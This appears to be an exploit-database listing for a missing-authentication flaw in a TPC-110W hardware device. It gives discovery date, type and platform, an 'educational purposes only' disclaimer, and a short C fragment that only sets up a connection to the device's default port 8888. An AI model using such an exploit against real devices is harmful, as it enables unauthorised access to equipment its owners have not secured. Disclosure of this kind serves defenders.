Tpc110w missing authentication for critical function Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2024-03-03 |
Type : remote |
Platform : hardware
This exploit / vulnerability Tpc110w missing authentication for critical function is for educational purposes only and if it is used you will do on your own risk!
memset(&serv_addr, '0', sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(8888); // The default port of TPC-110W is 8888
if (inet_pton(AF_INET, "192.168.1.10", &serv_addr.sin_addr) <= 0) { // Assuming the device's IP address is 192.168.1.10
perror("inet_pton");
exit(1);
}